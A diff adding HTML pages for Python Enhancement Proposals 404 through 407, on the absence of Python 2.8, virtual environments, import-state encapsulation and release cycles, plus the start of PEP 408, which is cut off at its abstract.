  • 2.8 final Never
  • +
+
+
+

Official pronouncement

+

Rule number six: there is no official Python 2.8 release. There never will +be an official Python 2.8 release. It is an ex-release. Python 2.7 +is the end of the Python 2 line of development.

+
+
+

Upgrade path

+

The official upgrade path from Python 2.7 is to Python 3.

+
+
+

And Now For Something Completely Different

+

In all seriousness, there are important reasons why there won’t be an +official Python 2.8 release, and why you should plan to migrate +instead to Python 3.

+

Python is (as of this writing) more than 20 years old, and Guido and the +community have learned a lot in those intervening years. Guido’s +original concept for Python 3 was to make changes to the language +primarily to remove the warts that had grown in the preceding +versions. Python 3 was not to be a complete redesign, but instead an +evolution of the language, and while maintaining full backward +compatibility with Python 2 was explicitly off-the-table, neither were +gratuitous changes in syntax or semantics acceptable. In most cases, +Python 2 code can be translated fairly easily to Python 3, sometimes +entirely mechanically by such tools as 2to3 (there’s also a non-trivial +subset of the language that will run without modification on both 2.7 and +3.x).

+

Because maintaining multiple versions of Python is a significant drag +on the resources of the Python developers, and because the +improvements to the language and libraries embodied in Python 3 are so +important, it was decided to end the Python 2 lineage with Python +2.7. Thus, all new development occurs in the Python 3 line of +development, and there will never be an official Python 2.8 release. +Python 2.7 will however be maintained for longer than the usual period +of time.

+

Here are some highlights of the significant improvements in Python 3. +You can read in more detail on the differences between Python 2 and +Python 3. There are also many good guides on porting from Python 2 +to Python 3.

+
+

Strings and bytes

+

Python 2’s basic original strings are called 8-bit strings, and +they play a dual role in Python 2 as both ASCII text and as byte +sequences. While Python 2 also has a unicode string type, the +fundamental ambiguity of the core string type, coupled with Python 2’s +default behavior of supporting automatic coercion from 8-bit strings +to unicode objects when the two are combined, often leads to +UnicodeErrors. Python 3’s standard string type is Unicode based, and +Python 3 adds a dedicated bytes type, but critically, no automatic coercion +between bytes and unicode strings is provided. The closest the language gets +to implicit coercion are a few text-based APIs that assume a default +encoding (usually UTF-8) if no encoding is explicitly stated. Thus, the core +interpreter, its I/O libraries, module names, etc. are clear in their +distinction between unicode strings and bytes. Python 3’s unicode +support even extends to the filesystem, so that non-ASCII file names are +natively supported.

+

This string/bytes clarity is often a source of difficulty in +transitioning existing code to Python 3, because many third party +libraries and applications are themselves ambiguous in this +distinction. Once migrated though, most UnicodeErrors can be +eliminated.

+
+
+

Numbers

+

Python 2 has two basic integer types, a native machine-sized int +type, and an arbitrary length long type. These have been merged in +Python 3 into a single int type analogous to Python 2’s long +type.

+

In addition, integer division now produces floating point numbers for +non-integer results.

+
+
+

Classes

+

Python 2 has two core class hierarchies, often called classic +classes and new-style classes. The latter allow for such things as +inheriting from the builtin basic types, support descriptor based tools +like the property builtin and provide a generally more sane and coherent +system for dealing with multiple inheritance. Python 3 provided the +opportunity to completely drop support for classic classes, so all classes +in Python 3 automatically use the new-style semantics (although that’s a +misnomer now). There is no need to explicitly inherit from object or set +the default metatype to enable them (in fact, setting a default metatype at +the module level is no longer supported - the default metatype is always +object).

+

The mechanism for explicitly specifying a metaclass has also changed to use +a metaclass keyword argument in the class header line rather than a +__metaclass__ magic attribute in the class body.

+
+
+

Multiple spellings

+

There are many cases in Python 2 where multiple spellings of some +constructs exist, such as repr() and backticks, or the two +inequality operators != and <>. In all cases, Python 3 has chosen +exactly one spelling and removed the other (e.g. repr() and != +were kept).

+
+
+

Imports

+

In Python 3, implicit relative imports within packages are no longer +available - only absolute imports and explicit relative imports are +supported. In addition, star imports (e.g. from x import *) are only +permitted in module level code.

+

Also, some areas of the standard library have been reorganized to make +the naming scheme more intuitive. Some rarely used builtins have been +relocated to standard library modules.

+
+
+

Iterators and views

+

Many APIs, which in Python 2 returned concrete lists, in Python 3 now +return iterators or lightweight views.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0404.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0405/index.html b/pep-0405/index.html new file mode 100644 index 00000000000..5f7f737ffd8 --- /dev/null +++ b/pep-0405/index.html @@ -0,0 +1,595 @@ + + + + + + + + PEP 405 – Python Virtual Environments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 405 – Python Virtual Environments

+
+
Author:
+
Carl Meyer <carl at oddbird.net>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
13-Jun-2011
+
Python-Version:
+
3.3
+
Post-History:
+
24-Oct-2011, 28-Oct-2011, 06-Mar-2012, 24-May-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add to Python a mechanism for lightweight +“virtual environments” with their own site directories, optionally +isolated from system site directories. Each virtual environment has +its own Python binary (allowing creation of environments with various +Python versions) and can have its own independent set of installed +Python packages in its site directories, but shares the standard +library with the base installed Python.

+
+
+

Motivation

+

The utility of Python virtual environments has already been well +established by the popularity of existing third-party +virtual-environment tools, primarily Ian Bicking’s virtualenv. +Virtual environments are already widely used for dependency management +and isolation, ease of installing and using Python packages without +system-administrator access, and automated testing of Python software +across multiple Python versions, among other uses.

+

Existing virtual environment tools suffer from lack of support from +the behavior of Python itself. Tools such as rvirtualenv, which do +not copy the Python binary into the virtual environment, cannot +provide reliable isolation from system site directories. Virtualenv, +which does copy the Python binary, is forced to duplicate much of +Python’s site module and manually symlink/copy an ever-changing +set of standard-library modules into the virtual environment in order +to perform a delicate boot-strapping dance at every startup. +(Virtualenv must copy the binary in order to provide isolation, as +Python dereferences a symlinked executable before searching for +sys.prefix.)

+

The PYTHONHOME environment variable, Python’s only existing +built-in solution for virtual environments, requires +copying/symlinking the entire standard library into every environment. +Copying the whole standard library is not a lightweight solution, and +cross-platform support for symlinks remains inconsistent (even on +Windows platforms that do support them, creating them often requires +administrator privileges).

+

A virtual environment mechanism integrated with Python and drawing on +years of experience with existing third-party tools can lower +maintenance, raise reliability, and be more easily available to all +Python users.

+
+
+

Specification

+

When the Python binary is executed, it attempts to determine its +prefix (which it stores in sys.prefix), which is then used to find +the standard library and other key files, and by the site module +to determine the location of the site-package directories. Currently +the prefix is found (assuming PYTHONHOME is not set) by first +walking up the filesystem tree looking for a marker file (os.py) +that signifies the presence of the standard library, and if none is +found, falling back to the build-time prefix hardcoded in the binary.

+

This PEP proposes to add a new first step to this search. If a +pyvenv.cfg file is found either adjacent to the Python executable or +one directory above it (if the executable is a symlink, it is not +dereferenced), this file is scanned for lines of the form key = +value. If a home key is found, this signifies that the Python +binary belongs to a virtual environment, and the value of the home +key is the directory containing the Python executable used to create +this virtual environment.

+

In this case, prefix-finding continues as normal using the value of +the home key as the effective Python binary location, which finds +the prefix of the base installation. sys.base_prefix is set to +this value, while sys.prefix is set to the directory containing +pyvenv.cfg.

+

(If pyvenv.cfg is not found or does not contain the home key, +prefix-finding continues normally, and sys.prefix will be equal to +sys.base_prefix.)

+

Also, sys.base_exec_prefix is added, and handled similarly with +regard to sys.exec_prefix. (sys.exec_prefix is the equivalent of +sys.prefix, but for platform-specific files; by default it has the +same value as sys.prefix.)

+

The site and sysconfig standard-library modules are modified +such that the standard library and header files are found relative +to sys.base_prefix / sys.base_exec_prefix, while site-package +directories (“purelib” and “platlib”, in sysconfig terms) are still +found relative to sys.prefix / sys.exec_prefix.

+

Thus, a Python virtual environment in its simplest form would consist +of nothing more than a copy or symlink of the Python binary +accompanied by a pyvenv.cfg file and a site-packages directory.

+
+

Isolation from system site-packages

+

By default, a virtual environment is entirely isolated from the +system-level site-packages directories.

+

If the pyvenv.cfg file also contains a key +include-system-site-packages with a value of true (not case +sensitive), the site module will also add the system site +directories to sys.path after the virtual environment site +directories. Thus system-installed packages will still be importable, +but a package of the same name installed in the virtual environment +will take precedence.

+

PEP 370 user-level site-packages are considered part of the system +site-packages for venv purposes: they are not available from an +isolated venv, but are available from an +include-system-site-packages = true venv.

+
+
+

Creating virtual environments

+

This PEP also proposes adding a new venv module to the standard +library which implements the creation of virtual environments. This +module can be executed using the -m flag:

+
python3 -m venv /path/to/new/virtual/environment
+
+
+

A pyvenv installed script is also provided to make this more +convenient:

+
pyvenv /path/to/new/virtual/environment
+
+
+

Running this command creates the target directory (creating any parent +directories that don’t exist already) and places a pyvenv.cfg file +in it with a home key pointing to the Python installation the +command was run from. It also creates a bin/ (or Scripts on +Windows) subdirectory containing a copy (or symlink) of the python3 +executable, and the pysetup3 script from the packaging standard +library module (to facilitate easy installation of packages from PyPI +into the new venv). And it creates an (initially empty) +lib/pythonX.Y/site-packages (or Lib\site-packages on Windows) +subdirectory.

+

If the target directory already exists an error will be raised, unless +the --clear option was provided, in which case the target +directory will be deleted and virtual environment creation will +proceed as usual.

+

The created pyvenv.cfg file also includes the +include-system-site-packages key, set to true if pyvenv is +run with the --system-site-packages option, false by default.

+

Multiple paths can be given to pyvenv, in which case an identical +venv will be created, according to the given options, at each +provided path.

+

The venv module also places “shell activation scripts” for POSIX and +Windows systems in the bin or Scripts directory of the +venv. These scripts simply add the virtual environment’s bin (or +Scripts) directory to the front of the user’s shell PATH. This is +not strictly necessary for use of a virtual environment (as an explicit +path to the venv’s python binary or scripts can just as well be used), +but it is convenient.

+

In order to allow pysetup and other Python package managers to +install packages into the virtual environment the same way they would +install into a normal Python installation, and avoid special-casing +virtual environments in sysconfig beyond using sys.base_prefix +in place of sys.prefix where appropriate, the internal virtual +environment layout mimics the layout of the Python installation itself +on each platform. So a typical virtual environment layout on a POSIX +system would be:

+
pyvenv.cfg
+bin/python3
+bin/python
+bin/pysetup3
+include/
+lib/python3.3/site-packages/
+
+
+

While on a Windows system:

+
pyvenv.cfg
+Scripts/python.exe
+Scripts/python3.dll
+Scripts/pysetup3.exe
+Scripts/pysetup3-script.py
+        ... other DLLs and pyds...
+Include/
+Lib/site-packages/
+
+
+

Third-party packages installed into the virtual environment will have +their Python modules placed in the site-packages directory, and +their executables placed in bin/ or Scripts.

+
+

Note

+

On a normal Windows system-level installation, the Python binary +itself wouldn’t go inside the “Scripts/” subdirectory, as it does +in the default venv layout. This is useful in a virtual +environment so that a user only has to add a single directory to +their shell PATH in order to effectively “activate” the virtual +environment.

+
+
+

Note

+

On Windows, it is necessary to also copy or symlink DLLs and pyd +files from compiled stdlib modules into the env, because if the +venv is created from a non-system-wide Python installation, +Windows won’t be able to find the Python installation’s copies of +those files when Python is run from the venv.

+
+
+
+

Sysconfig install schemes and user-site

+

This approach explicitly chooses not to introduce a new sysconfig +install scheme for venvs. Rather, by modifying sys.prefix we +ensure that existing install schemes which base locations on +sys.prefix will simply work in a venv. Installation to other +install schemes (for instance, the user-site schemes) whose paths are +not relative to sys.prefix, will not be affected by a venv at all.

+

It may be feasible to create an alternative implementation of Python +virtual environments based on a virtual-specific sysconfig scheme, but +it would be less robust, as it would require more code to be aware of +whether it is operating within a virtual environment or not.

+
+ +
+

Include files

+

Current virtualenv handles include files in this way:

+

On POSIX systems where the installed Python’s include files are found in +${base_prefix}/include/pythonX.X, virtualenv creates +${venv}/include/ and symlinks ${base_prefix}/include/pythonX.X +to ${venv}/include/pythonX.X. On Windows, where Python’s include +files are found in {{ sys.prefix }}/Include and symlinks are not +reliably available, virtualenv copies {{ sys.prefix }}/Include to +${venv}/Include. This ensures that extension modules built and +installed within the virtualenv will always find the Python header files +they need in the expected location relative to sys.prefix.

+

This solution is not ideal when an extension module installs its own +header files, as the default installation location for those header +files may be a symlink to a system directory that may not be +writable. One installer, pip, explicitly works around this by +installing header files to a nonstandard location +${venv}/include/site/pythonX.X/, as in Python there’s currently no +standard abstraction for a site-specific include directory.

+

This PEP proposes a slightly different approach, though one with +essentially the same effect and the same set of advantages and +disadvantages. Rather than symlinking or copying include files into the +venv, we simply modify the sysconfig schemes so that header files are +always sought relative to base_prefix rather than prefix. (We +also create an include/ directory within the venv, so installers +have somewhere to put include files installed within the env).

+

Better handling of include files in distutils/packaging and, by +extension, pyvenv, is an area that may deserve its own future PEP. For +now, we propose that the behavior of virtualenv has thus far proved +itself to be at least “good enough” in practice.

+
+
+

API

+

The high-level method described above makes use of a simple API which +provides mechanisms for third-party virtual environment creators to +customize environment creation according to their needs.

+

The venv module contains an EnvBuilder class which accepts the +following keyword arguments on instantiation:

+
    +
  • system_site_packages - A Boolean value indicating that the +system Python site-packages should be available to the environment. +Defaults to False.
  • +
  • clear - A Boolean value which, if true, will delete any existing +target directory instead of raising an exception. Defaults to +False.
  • +
  • symlinks - A Boolean value indicating whether to attempt to +symlink the Python binary (and any necessary DLLs or other binaries, +e.g. pythonw.exe), rather than copying. Defaults to False.
  • +
+

The instantiated env-builder has a create method, which takes as +required argument the path (absolute or relative to the current +directory) of the target directory which is to contain the virtual +environment. The create method either creates the environment in +the specified directory, or raises an appropriate exception.

+

The venv module also provides a module-level create function +as a convenience:

+
def create(env_dir,
+           system_site_packages=False, clear=False, use_symlinks=False):
+    builder = EnvBuilder(
+        system_site_packages=system_site_packages,
+        clear=clear,
+        use_symlinks=use_symlinks)
+    builder.create(env_dir)
+
+
+

Creators of third-party virtual environment tools are free to use the +provided EnvBuilder class as a base class.

+

The create method of the EnvBuilder class illustrates the +hooks available for customization:

+
def create(self, env_dir):
+    """
+    Create a virtualized Python environment in a directory.
+
+    :param env_dir: The target directory to create an environment in.
+
+    """
+    env_dir = os.path.abspath(env_dir)
+    context = self.create_directories(env_dir)
+    self.create_configuration(context)
+    self.setup_python(context)
+    self.post_setup(context)
+
+
+

Each of the methods create_directories, create_configuration, +setup_python, and post_setup can be overridden. The functions +of these methods are:

+
    +
  • create_directories - creates the environment directory and all +necessary directories, and returns a context object. This is just a +holder for attributes (such as paths), for use by the other methods.
  • +
  • create_configuration - creates the pyvenv.cfg configuration +file in the environment.
  • +
  • setup_python - creates a copy of the Python executable (and, +under Windows, DLLs) in the environment.
  • +
  • post_setup - A (no-op by default) hook method which can be +overridden in third party subclasses to pre-install packages or +install scripts in the virtual environment.
  • +
+

In addition, EnvBuilder provides a utility method that can be +called from post_setup in subclasses to assist in installing +custom scripts into the virtual environment. The method +install_scripts accepts as arguments the context object (see +above) and a path to a directory. The directory should contain +subdirectories “common”, “posix”, “nt”, each containing scripts +destined for the bin directory in the environment. The contents of +“common” and the directory corresponding to os.name are copied +after doing some text replacement of placeholders:

+
    +
  • __VENV_DIR__ is replaced with absolute path of the environment +directory.
  • +
  • __VENV_NAME__ is replaced with the environment name (final path +segment of environment directory).
  • +
  • __VENV_BIN_NAME__ is replaced with the name of the bin directory +(either bin or Scripts).
  • +
  • __VENV_PYTHON__ is replaced with the absolute path of the +environment’s executable.
  • +
+

The DistributeEnvBuilder subclass in the reference implementation +illustrates how the customization hook can be used in practice to +pre-install Distribute into the virtual environment. It’s not +envisaged that DistributeEnvBuilder will be actually added to +Python core, but it makes the reference implementation more +immediately useful for testing and exploratory purposes.

+
+
+
+

Backwards Compatibility

+
+

Splitting the meanings of sys.prefix

+

Any virtual environment tool along these lines (which attempts to +isolate site-packages, while still making use of the base Python’s +standard library with no need for it to be symlinked into the virtual +environment) is proposing a split between two different meanings +(among others) that are currently both wrapped up in sys.prefix: +the answers to the questions “Where is the standard library?” and +“Where is the site-packages location where third-party modules should +be installed?”

+

This split could be handled by introducing a new sys attribute for +either the former prefix or the latter prefix. Either option +potentially introduces some backwards-incompatibility with software +written to assume the other meaning for sys.prefix. (Such +software should preferably be using the APIs in the site and +sysconfig modules to answer these questions rather than using +sys.prefix directly, in which case there is no +backwards-compatibility issue, but in practice sys.prefix is +sometimes used.)

+

The documentation for sys.prefix describes it as “A string +giving the site-specific directory prefix where the platform +independent Python files are installed,” and specifically mentions the +standard library and header files as found under sys.prefix. It +does not mention site-packages.

+

Maintaining this documented definition would mean leaving +sys.prefix pointing to the base system installation (which is +where the standard library and header files are found), and +introducing a new value in sys (something like +sys.site_prefix) to point to the prefix for site-packages. +This would maintain the documented semantics of sys.prefix, but +risk breaking isolation if third-party code uses sys.prefix rather +than sys.site_prefix or the appropriate site API to find +site-packages directories.

+

The most notable case is probably setuptools and its fork +distribute, which mostly use distutils and sysconfig APIs, +but do use sys.prefix directly to build up a list of site +directories for pre-flight checking where pth files can usefully be +placed.

+

Otherwise, a Google Code Search turns up what appears to be a +roughly even mix of usage between packages using sys.prefix to +build up a site-packages path and packages using it to e.g. eliminate +the standard-library from code-execution tracing.

+

Although it requires modifying the documented definition of +sys.prefix, this PEP prefers to have sys.prefix point to the +virtual environment (where site-packages is found), and introduce +sys.base_prefix to point to the standard library and Python header +files. Rationale for this choice:

+
    +
  • It is preferable to err on the side of greater isolation of the +virtual environment.
  • +
  • Virtualenv already modifies sys.prefix to point at the virtual +environment, and in practice this has not been a problem.
  • +
  • No modification is required to setuptools/distribute.
  • +
+
+
+

Impact on other Python implementations

+

The majority of this PEP’s changes occur in the standard library, which is +shared by other Python implementations and should not present any +problem.

+

Other Python implementations will need to replicate the new +sys.prefix-finding behavior of the interpreter bootstrap, including +locating and parsing the pyvenv.cfg file, if it is present.

+
+
+
+

Reference Implementation

+

The reference implementation is found in a clone of the CPython +Mercurial repository. To test it, build and run bin/pyvenv +/path/to/new/venv to create a virtual environment.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0405.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0406/index.html b/pep-0406/index.html new file mode 100644 index 00000000000..5b7d3ed3554 --- /dev/null +++ b/pep-0406/index.html @@ -0,0 +1,375 @@ + + + + + + + + PEP 406 – Improved Encapsulation of Import State | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 406 – Improved Encapsulation of Import State

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Greg Slodkowicz <jergosh at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Jul-2011
+
Python-Version:
+
3.4
+
Post-History:
+
31-Jul-2011, 13-Nov-2011, 04-Dec-2011
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the introduction of a new ‘ImportEngine’ class as part of +importlib which would encapsulate all state related to importing modules +into a single object. Creating new instances of this object would then provide +an alternative to completely replacing the built-in implementation of the +import statement, by overriding the __import__() function. To work with +the builtin import functionality and importing via import engine objects, +this PEP proposes a context management based approach to temporarily replacing +the global import state.

+

The PEP also proposes inclusion of a GlobalImportEngine subclass and a +globally accessible instance of that class, which “writes through” to the +process global state. This provides a backwards compatible bridge between the +proposed encapsulated API and the legacy process global state, and allows +straightforward support for related state updates (e.g. selectively +invalidating path cache entries when sys.path is modified).

+
+
+

PEP Withdrawal

+

The import system has seen substantial changes since this PEP was originally +written, as part of PEP 420 in Python 3.3 and PEP 451 in Python 3.4.

+

While providing an encapsulation of the import state is still highly +desirable, it is better tackled in a new PEP using PEP 451 as a foundation, +and permitting only the use of PEP 451 compatible finders and loaders (as +those avoid many of the issues of direct manipulation of global state +associated with the previous loader API).

+
+
+

Rationale

+

Currently, most state related to the import system is stored as module level +attributes in the sys module. The one exception is the import lock, which +is not accessible directly, but only via the related functions in the imp +module. The current process global import state comprises:

+
    +
  • sys.modules
  • +
  • sys.path
  • +
  • sys.path_hooks
  • +
  • sys.meta_path
  • +
  • sys.path_importer_cache
  • +
  • the import lock (imp.lock_held()/acquire_lock()/release_lock())
  • +
+

Isolating this state would allow multiple import states to be +conveniently stored within a process. Placing the import functionality +in a self-contained object would also allow subclassing to add additional +features (e.g. module import notifications or fine-grained control +over which modules can be imported). The engine would also be +subclassed to make it possible to use the import engine API to +interact with the existing process-global state.

+

The namespace PEPs (especially PEP 402) raise a potential need for +additional process global state, in order to correctly update package paths +as sys.path is modified.

+

Finally, providing a coherent object for all this state makes it feasible to +also provide context management features that allow the import state to be +temporarily substituted.

+
+
+

Proposal

+

We propose introducing an ImportEngine class to encapsulate import +functionality. This includes an __import__() method which can +be used as an alternative to the built-in __import__() when +desired and also an import_module() method, equivalent to +importlib.import_module() [3].

+

Since there are global import state invariants that are assumed and should be +maintained, we introduce a GlobalImportState class with an interface +identical to ImportEngine but directly accessing the current global import +state. This can be easily implemented using class properties.

+
+
+

Specification

+
+

ImportEngine API

+

The proposed extension consists of the following objects:

+

importlib.engine.ImportEngine

+
+
from_engine(self, other)
+
Create a new import object from another ImportEngine instance. The +new object is initialised with a copy of the state in other. When +called on importlib engine.sysengine, from_engine() can be +used to create an ImportEngine object with a copy of the +global import state.
+

__import__(self, name, globals={}, locals={}, fromlist=[], level=0)

+
+
Reimplementation of the builtin __import__() function. The +import of a module will proceed using the state stored in the +ImportEngine instance rather than the global import state. For full +documentation of __import__ functionality, see [2] . +__import__() from ImportEngine and its subclasses can be used +to customise the behaviour of the import statement by replacing +__builtin__.__import__ with ImportEngine().__import__.
+

import_module(name, package=None)

+
+
A reimplementation of importlib.import_module() which uses the +import state stored in the ImportEngine instance. See [3] for a full +reference.
+

modules, path, path_hooks, meta_path, path_importer_cache

+
+
Instance-specific versions of their process global sys equivalents
+
+

importlib.engine.GlobalImportEngine(ImportEngine)

+
+
Convenience class to provide engine-like access to the global state. +Provides __import__(), import_module() and from_engine() +methods like ImportEngine but writes through to the global state +in sys.
+

To support various namespace package mechanisms, when sys.path is altered, +tools like pkgutil.extend_path should be used to also modify other parts +of the import state (in this case, package __path__ attributes). The path +importer cache should also be invalidated when a variety of changes are made.

+

The ImportEngine API will provide convenience methods that automatically +make related import state updates as part of a single operation.

+
+
+

Global variables

+

importlib.engine.sysengine

+
+
A precreated instance of GlobalImportEngine. Intended for use by +importers and loaders that have been updated to accept optional engine +parameters and with ImportEngine.from_engine(sysengine) to start with +a copy of the process global import state.
+
+
+

No changes to finder/loader interfaces

+

Rather than attempting to update the PEP 302 APIs to accept additional state, +this PEP proposes that ImportEngine support the content management +protocol (similar to the context substitution mechanisms in the decimal +module).

+

The context management mechanism for ImportEngine would:

+
    +
  • On entry: +* Acquire the import lock +* Substitute the global import state with the import engine’s own state
  • +
  • On exit: +* Restore the previous global import state +* Release the import lock
  • +
+

The precise API for this is TBD (but will probably use a distinct context +management object, along the lines of that created by +decimal.localcontext).

+
+
+
+

Open Issues

+
+

API design for falling back to global import state

+

The current proposal relies on the from_engine() API to fall back to the +global import state. It may be desirable to offer a variant that instead falls +back to the global import state dynamically.

+

However, one big advantage of starting with an “as isolated as possible” +design is that it becomes possible to experiment with subclasses that blur +the boundaries between the engine instance state and the process global state +in various ways.

+
+
+

Builtin and extension modules must be process global

+

Due to platform limitations, only one copy of each builtin and extension +module can readily exist in each process. Accordingly, it is impossible for +each ImportEngine instance to load such modules independently.

+

The simplest solution is for ImportEngine to refuse to load such modules, +raising ImportError. GlobalImportEngine would be able to load them +normally.

+

ImportEngine will still return such modules from a prepopulated module +cache - it’s only loading them directly which causes problems.

+
+
+

Scope of substitution

+

Related to the previous open issue is the question of what state to substitute +when using the context management API. It is currently the case that replacing +sys.modules can be unreliable due to cached references and there’s the +underlying fact that having independent copies of some modules is simply +impossible due to platform limitations.

+

As part of this PEP, it will be necessary to document explicitly:

+
    +
  • Which parts of the global import state can be substituted (and declare code +which caches references to that state without dealing with the substitution +case buggy)
  • +
  • Which parts must be modified in-place (and hence are not substituted by the +ImportEngine context management API, or otherwise scoped to +ImportEngine instances)
  • +
+
+
+
+

Reference Implementation

+

A reference implementation [4] for an earlier draft of this PEP, based on +Brett Cannon’s importlib has been developed by Greg Slodkowicz as part of the +2011 Google Summer of Code. Note that the current implementation avoids +modifying existing code, and hence duplicates a lot of things unnecessarily. +An actual implementation would just modify any such affected code in place.

+

That earlier draft of the PEP proposed change the PEP 302 APIs to support passing +in an optional engine instance. This had the (serious) downside of not correctly +affecting further imports from the imported module, hence the change to the +context management based proposal for substituting the global state.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0406.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0407/index.html b/pep-0407/index.html new file mode 100644 index 00000000000..47132407f86 --- /dev/null +++ b/pep-0407/index.html @@ -0,0 +1,278 @@ + + + + + + + + PEP 407 – New release cycle and introducing long-term support versions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 407 – New release cycle and introducing long-term support versions

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>, +Georg Brandl <georg at python.org>, +Barry Warsaw <barry at python.org>
+
Status:
+
Deferred
+
Type:
+
Process
+
Created:
+
12-Jan-2012
+
Post-History:
+
17-Jan-2012
+
+
+
+
Table of Contents +
+
+

Abstract

+

Finding a release cycle for an open-source project is a delicate +exercise in managing mutually contradicting constraints: developer +manpower, availability of release management volunteers, ease of +maintenance for users and third-party packagers, quick availability of +new features (and behavioural changes), availability of bug fixes +without pulling in new features or behavioural changes.

+

The current release cycle errs on the conservative side. It is +adequate for people who value stability over reactivity. This PEP is +an attempt to keep the stability that has become a Python trademark, +while offering a more fluid release of features, by introducing the +notion of long-term support versions.

+
+
+

Scope

+

This PEP doesn’t try to change the maintenance period or release +scheme for the 2.7 branch. Only 3.x versions are considered.

+
+
+

Proposal

+

Under the proposed scheme, there would be two kinds of feature +versions (sometimes dubbed “minor versions”, for example 3.2 or 3.3): +normal feature versions and long-term support (LTS) versions.

+

Normal feature versions would get either zero or at most one bugfix +release; the latter only if needed to fix critical issues. Security +fix handling for these branches needs to be decided.

+

LTS versions would get regular bugfix releases until the next LTS +version is out. They then would go into security fixes mode, up to a +termination date at the release manager’s discretion.

+
+

Periodicity

+

A new feature version would be released every X months. We +tentatively propose X = 6 months.

+

LTS versions would be one out of N feature versions. We tentatively +propose N = 4.

+

With these figures, a new LTS version would be out every 24 months, +and remain supported until the next LTS version 24 months later. This +is mildly similar to today’s 18 months bugfix cycle for every feature +version.

+
+
+

Pre-release versions

+

More frequent feature releases imply a smaller number of disruptive +changes per release. Therefore, the number of pre-release builds +(alphas and betas) can be brought down considerably. Two alpha builds +and a single beta build would probably be enough in the regular case. +The number of release candidates depends, as usual, on the number of +last-minute fixes before final release.

+
+
+
+

Effects

+
+

Effect on development cycle

+

More feature releases might mean more stress on the development and +release management teams. This is quantitatively alleviated by the +smaller number of pre-release versions; and qualitatively by the +lesser amount of disruptive changes (meaning less potential for +breakage). The shorter feature freeze period (after the first beta +build until the final release) is easier to accept. The rush for +adding features just before feature freeze should also be much +smaller.

+
+
+

Effect on bugfix cycle

+

The effect on fixing bugs should be minimal with the proposed figures. +The same number of branches would be simultaneously open for bugfix +maintenance (two until 2.x is terminated, then one).

+
+
+

Effect on workflow

+

The workflow for new features would be the same: developers would only +commit them on the default branch.

+

The workflow for bug fixes would be slightly updated: developers would +commit bug fixes to the current LTS branch (for example 3.3) and +then merge them into default.

+

If some critical fixes are needed to a non-LTS version, they can be +grafted from the current LTS branch to the non-LTS branch, just like +fixes are ported from 3.x to 2.7 today.

+
+
+

Effect on the community

+

People who value stability can just synchronize on the LTS releases +which, with the proposed figures, would give a similar support cycle +(both in duration and in stability).

+

People who value reactivity and access to new features (without taking +the risk to install alpha versions or Mercurial snapshots) would get +much more value from the new release cycle than currently.

+

People who want to contribute new features or improvements would be +more motivated to do so, knowing that their contributions will be more +quickly available to normal users. Also, a smaller feature freeze +period makes it less cumbersome to interact with contributors of +features.

+
+
+
+

Discussion

+

These are open issues that should be worked out during discussion:

+
    +
  • Decide on X (months between feature releases) and N (feature releases +per LTS release) as defined above.
  • +
  • For given values of X and N, is the no-bugfix-releases policy for +non-LTS versions feasible?
  • +
  • What is the policy for security fixes?
  • +
  • Restrict new syntax and similar changes (i.e. everything that was +prohibited by PEP 3003) to LTS versions?
  • +
  • What is the effect on packagers such as Linux distributions?
  • +
  • How will release version numbers or other identifying and marketing +material make it clear to users which versions are normal feature +releases and which are LTS releases? How do we manage user +expectations?
  • +
  • Does the faster release cycle mean we could some day reach 3.10 and +above? Some people expressed a tacit expectation that version numbers +always fit in one decimal digit.
  • +
+

A community poll or survey to collect opinions from the greater Python +community would be valuable before making a final decision.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0407.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0408/index.html b/pep-0408/index.html new file mode 100644 index 00000000000..87d851be2a9 --- /dev/null +++ b/pep-0408/index.html @@ -0,0 +1,432 @@ + + + + + + + + PEP 408 – Standard library __preview__ package | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 408 – Standard library __preview__ package

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Eli Bendersky <eliben at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
07-Jan-2012
+
Python-Version:
+
3.3
+
Post-History:
+
27-Jan-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

